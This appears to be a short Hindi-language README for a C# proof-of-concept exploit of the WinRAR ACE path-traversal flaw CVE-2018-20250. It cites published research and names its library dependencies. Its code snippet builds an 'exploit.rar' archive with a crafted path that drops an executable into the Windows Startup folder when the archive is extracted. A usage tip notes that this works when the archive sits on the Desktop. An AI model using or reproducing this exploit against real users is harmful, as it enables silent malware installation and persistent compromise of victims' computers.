
WinRAR ACE फ़ाइल निष्कर्षण पथ (CVE-2018-20250) का शोषण करने के लिए C# में प्रूफ ऑफ कॉन्सेप्ट कोड।
WinRAR ACE फ़ाइल निष्कर्षण पथ (CVE-2018-20250) का शोषण करने के लिए C# में प्रूफ ऑफ कॉन्सेप्ट कोड।
https://research.checkpoint.com/extracting-code-execution-from-winrar/ https://github.com/droe/acefile https://apidoc.roe.ch/acefile/latest/
InvertedTomato.Crc (आप इसे NuGet के साथ स्थापित कर सकते हैं) चेकसम विधि के लिए। आप किसी भी अन्य JAMCRC कार्यान्वयन का उपयोग कर सकते हैं।
AceVolume av = new AceVolume();
AceFile f = new AceFile(
@"D:\some_file.exe",
@"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
);
av.AddFile(f);
av.Save("exploit.rar");
ऐसा लगता है कि यह केवल स्टार्टअप फ़ोल्डर में निकालता है जब .rar फ़ाइल डेस्कटॉप या उसी स्तर के किसी भी फ़ोल्डर में हो।